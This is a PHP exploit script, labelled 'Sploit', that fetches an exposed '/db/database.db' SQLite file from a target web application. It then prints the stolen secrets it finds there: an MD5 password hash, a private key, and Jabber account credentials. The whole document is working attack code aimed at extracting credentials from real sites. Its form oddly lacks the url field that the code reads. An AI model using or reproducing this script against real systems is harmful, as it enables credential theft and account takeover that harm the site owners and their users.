<?php
$url = getURL();
if ($url !== NULL) {
$database = @file_get_contents($url . '/db/database.db');
if ($database !== FALSE) {
file_put_contents('tmp.db', $database);
$password_md5 = getOption('password_md5');
$pkey = getOption('pkey');
$jabber_on = getOption('jabber_on');
$jabber_sender = getOption('jabber_sender');
$jabber_password = getOption('jabber_password');
$jabber_port = getOption('jabber_port');
$jabber_recipient = getOption('jabber_recepient');
writeLine('URL: ' . htmlentities($url));
writeLine('MD5 password: ' . htmlentities($password_md5));
writeLine('pkey: ' . htmlentities($pkey));
writeLine('Jabber ' . htmlentities($jabber_on));
writeLine('Sender: ' . htmlentities($jabber_sender));
writeLine('Password: ' . htmlentities($jabber_password));
writeLine('Port: ' . htmlentities($jabber_port));
writeLine('Recipient: ' . htmlentities($jabber_recipient));
unlink('tmp.db');
}
else {
writeLine('Cannot get database...');
}
writeLine('');
echo('<a href="' . basename($_SERVER['PHP_SELF']) . '">Back</a>');
}
else {
?>
<form method="POST">
<input type="submit" value="Sploit" />
</form>
<?php
}
function getURL() {
global $_POST;
if (isset($_POST['url']) &&
!is_array($_POST['url']) &&
is_string($_POST['url']) &&
strlen($_POST['url']) > 0 &&
filter_var($_POST['url'], FILTER_VALIDATE_URL)) {
return $_POST['url'];
}
return NULL;
}
function writeLine($str) {
echo($str . "\n");
}
function getOption($option) {
$db = new SQLite3('tmp.db');
$sql = 'SELECT value AS result FROM options WHERE param="' . $option . '"';
$result = $db-> querySingle($sql, true);
$db-> close();
return sizeof($result) > 0 ? $result['result'] : '';
}
?>
